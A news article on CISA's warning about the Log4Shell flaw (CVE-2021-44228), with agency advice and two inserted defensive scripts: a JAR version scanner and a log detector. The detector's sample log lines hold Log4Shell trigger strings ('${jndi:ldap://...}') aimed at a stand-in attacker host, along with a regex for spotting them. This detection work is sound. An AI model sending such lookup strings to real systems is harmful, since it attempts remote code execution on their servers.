CISA warns public, private sector of critical log4j vulnerability

log4j vulnerability

The Cybersecurity and Infrastructure Security Agency (CISA) has urged public and private sector partners to proactively address a critical ‘log4j vulnerability’ that affects products containing the log4j software library. The vulnerability, which is being widely exploited by a growing set of attackers, presents an urgent challenge to network defenders given the library’s broad use.

“To be clear, this vulnerability poses a severe risk. We will only minimize potential impacts through collaborative efforts between government and the private sector. We urge all organizations to join us in this essential effort and take action,” Jen Easterly, CISA director, wrote in a statement released on Saturday. “To ensure the broadest possible dissemination of key information, we are also convening a national call with critical infrastructure stakeholders on Monday afternoon where CISA’s experts provide further insight and address questions,” she added.  

To secure installations from the severe log4j vulnerability, CISA advised asset owners to enumerate any external-facing devices that have log4j installed, and make sure that the organization’s security operations center (SOC) is actioning every single alert on the devices that fall into the category above. The security agency also recommended installing a web application firewall (WAF) with rules that automatically update so that the SOC is able to concentrate on fewer alerts. 

“This effort also underscores the urgency of building software securely from the start and more widespread use of Software Bill of Materials (SBOM), both of which were directed by President Biden in his Executive Order issued in May 2021,” Easterly said. “A SBOM would provide end-users with the transparency they require to know if their products rely on vulnerable software libraries,” she added.

The U.S. administration has taken various measures to deal with rising cybersecurity incidents over recent months. 

Last week, CISA held its inaugural Cybersecurity Advisory Committee meeting. “It’s clear that we’re at a critical juncture in cybersecurity, a moment when it will take our nation’s best thinking to defend against the evolving adversaries looking to do harm to our critical infrastructure,” Easterly said at the time. “It will require collaboration across government, the private sector, and the technical community. It demands that CISA has the right strategy in place to prepare for, respond to, and mitigate against cybersecurity threats to our Nation’s critical systems. In short, it takes more collaboration than ever before,” she added.

Previously, the agency had launched an effort called the Joint Cyber Defense Collaborative (JCDC) to lead the development of the nation’s cyber defense plans by working across the public and private sectors to help defend U.S. critical infrastructure.

Log4j 2 is an open-source Java logging library developed by the Apache Software Foundation and widely used by both enterprise apps and cloud services. Tracked as CVE-2021-44228 and dubbed ‘Log4Shell,’ the log4j vulnerability is an unauthenticated remote code execution (RCE) flaw that allows complete system takeover on systems using Log4j versions 2.0-beta9 up to 2.14.1. Exploitation activity linked to the log4j vulnerability had been observed from 58 countries as of Dec. 12.

Apache has released Log4j 2.15.0 to resolve the vulnerability, which is trivial to exploit. 

The U.K.’s National Cyber Security Centre (NCSC) said in an advisory that it is aware that scanning for the log4j vulnerability has been detected in the U.K. and exploitation detected elsewhere. Proof-of-concept code is available, it added.

The NCSC recommends that users install the latest updates as soon as practicable. “If you are using the Log4j 2 library as a dependency within an application you have developed, ensure you update to version 2.15.0 or later,” the security agency advised. “If you are using an affected third-party application, ensure you keep the product updated to the latest version. The flaw can also be mitigated in previous releases (2.10 and later) by setting system property ‘log4j2.formatMsgNoLookups’ to ‘true’ or removing the JndiLookup class from the classpath,” it added.
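The first step CISA and the NCSC describe is knowing where log4j is installed and whether each copy is still exposed. The script below is an added example, not code from CISA, the NCSC or the Apache project: it walks a directory tree, reads the version recorded inside each log4j-core JAR, compares it against the affected range the article gives (2.0-beta9 through 2.14.1), and reports whether the JndiLookup class the NCSC mentions has been removed. It assumes two things about how log4j-core JARs are packaged, both labelled in the code: the Maven `pom.properties` path that carries the `version=` line, and the `JndiLookup.class` path inside the archive.

```python
"""Inventory log4j-core JARs and classify them against CVE-2021-44228.

Added example, not CISA's, NCSC's or Apache's code. Assumptions (true for
released 2.x Maven artifacts, but verify for vendor repackagings):
  - the JAR carries META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties
    with a `version=` line;
  - the JNDI lookup lives at org/apache/logging/log4j/core/lookup/JndiLookup.class.
"""
import io
import re
import zipfile
from pathlib import Path

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1, 0); '2.0-beta9' -> (2, 0, 0, 0, 9).

    The fourth field orders a pre-release before the final release of the
    same number, so 2.0-beta9 < 2.0 < 2.0.1 compares correctly as tuples.
    """
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-beta(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {text!r}")
    major, minor, patch, beta = m.groups()
    return (int(major), int(minor), int(patch or 0),
            0 if beta else 1, int(beta or 0))


FIRST_AFFECTED = parse_version("2.0-beta9")   # range as stated in the article
LAST_AFFECTED = parse_version("2.14.1")


def classify_jar(data):
    """Return (version, verdict) for the raw bytes of one JAR.

    Verdicts: 'fixed' (newer than 2.14.1), 'mitigated' (affected version but
    JndiLookup.class removed), 'vulnerable', 'outside-range' (older than
    2.0-beta9) or 'unknown' (not a log4j-core JAR).
    """
    with zipfile.ZipFile(io.BytesIO(data)) as jar:
        names = set(jar.namelist())
        if POM_PROPS not in names:
            return None, "unknown"
        props = jar.read(POM_PROPS).decode("utf-8", errors="replace")
    version = None
    for line in props.splitlines():
        if line.startswith("version="):
            version = line.split("=", 1)[1].strip()
    if version is None:
        return None, "unknown"
    key = parse_version(version)
    if key > LAST_AFFECTED:
        return version, "fixed"
    if key < FIRST_AFFECTED:
        return version, "outside-range"
    return version, "mitigated" if JNDI_CLASS not in names else "vulnerable"


def scan_directory(root):
    """Classify every .jar under root; returns {path: (version, verdict)}."""
    results = {}
    for path in Path(root).rglob("*.jar"):
        try:
            results[str(path)] = classify_jar(path.read_bytes())
        except (zipfile.BadZipFile, ValueError) as exc:
            results[str(path)] = (None, f"error: {exc}")
    return results


def make_jar(version, include_jndi=True):
    """Build a constructed, minimal log4j-core-like JAR in memory for testing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                                f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not a real class
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed JARs covering each verdict; on a real host call scan_directory("/opt").
    for ver, jndi in [("2.14.1", True), ("2.14.1", False), ("2.15.0", True), ("2.0-beta8", True)]:
        print(ver, "with" if jndi else "without", "JndiLookup ->", classify_jar(make_jar(ver, jndi)))
```

Two limits worth noting when running this against real hosts: the `log4j2.formatMsgNoLookups` mitigation is a JVM launch setting, so it is invisible inside the JAR and has to be checked in the service’s startup configuration separately, and log4j-core copies nested inside WAR, EAR or fat JARs are not opened by this walk and need the same check applied recursively.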

The German cybersecurity authority BSI also released over the weekend a red alert warning, its highest level, on the flawed piece of widely-used software, saying it posed an ‘extremely critical threat’ to web servers. The BSI said it is “aware of world- and Germany-wide mass scans as well as attempted compromises. Initial successful compromises are also being publicly reported,” according to a Reuters report.

Cybersecurity firm McAfee has said that the log4j vulnerability was publicly disclosed along with proof of concept (PoC) code that exploits the vulnerability. “Should the vulnerability be present, an attacker might run arbitrary code by forcing the application or server to log a specific string. This string can force the vulnerable system to download and run a malicious script from the attacker-controlled system, which would allow them to effectively take over the vulnerable application or server.” 

“The vulnerability exists in the way the Java Naming and Directory Interface (JNDI) feature resolves variables,” Steve Povolny and Douglas McKee wrote in a McAfee blog post. “When a JNDI reference is being written to a log, JNDI will fetch all requirements to resolve the variable. To complete this process, it will download and execute any remote classes required. This applies to both server-side and client-side applications since the main requirements for the vulnerability are any attacker-controlled input field and this input being passed to the log,” they added.
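Because the trigger is a JNDI reference landing in a log, the same string is also the most direct thing a SOC can hunt for in web server logs while patching is under way. The script below is an added example, not McAfee’s code: it runs a pattern for Log4j’s `${jndi:...}` lookup syntax over a few constructed access-log lines (the addresses are from reserved documentation ranges) and summarises hits per source address so the noisiest senders can be triaged first.

```python
"""Flag log lines carrying a JNDI lookup string, the Log4Shell trigger.

Added example, not McAfee's code. Assumes Apache/nginx-style access logs
whose first field is the client address; SAMPLE_LOG is constructed.
"""
import re

# Log4j lookups use ${name:...}; the jndi lookup is the one whose resolution
# fetches remote classes, as described in the McAfee quote above.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:(?P<scheme>[a-zA-Z]+)", re.IGNORECASE)

SAMPLE_LOG = """\
203.0.113.7 - - [11/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"
203.0.113.9 - - [11/Dec/2021:03:14:11 +0000] "GET /?q=${jndi:rmi://198.51.100.23:1099/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.12 - - [11/Dec/2021:03:15:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def find_jndi_lookups(lines):
    """Return [(line_number, scheme, source_ip)] for each line with a JNDI lookup.

    Any field is checked, since the article notes the input can arrive through
    any logged field (here the User-Agent on line 2 and the query string on line 3).
    """
    hits = []
    for number, line in enumerate(lines, start=1):
        m = JNDI_LOOKUP.search(line)
        if m:
            source_ip = line.split(" ", 1)[0]
            hits.append((number, m.group("scheme").lower(), source_ip))
    return hits


def summarise(hits):
    """Count hits per source address so the SOC can prioritise the noisiest senders."""
    counts = {}
    for _, _, ip in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = find_jndi_lookups(SAMPLE_LOG.splitlines())
    for number, scheme, ip in hits:
        print(f"line {number}: jndi:{scheme} lookup from {ip}")
    print(summarise(hits))
```

This matches only the literal lookup prefix, which is enough for a first pass over historical logs. Since the string is easy to rewrite while keeping the same meaning to Log4j, it is not a substitute for the auto-updating WAF rules CISA recommends, and a hit should be treated as evidence of an attempt rather than of a successful compromise; the host inventory decides which targets were actually exposed.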

The Apache Log4j remote code execution vulnerability is the single biggest, most critical vulnerability of the last decade, Amit Yoran, CEO of Tenable, wrote in an emailed statement. “This kind of vulnerability is a reminder that organizations must develop mature cybersecurity programs to understand cyber risk in a dynamic world. While details are still emerging, we encourage organizations to update their security controls, assume they have been compromised and activate existing incident response plans,” he added.
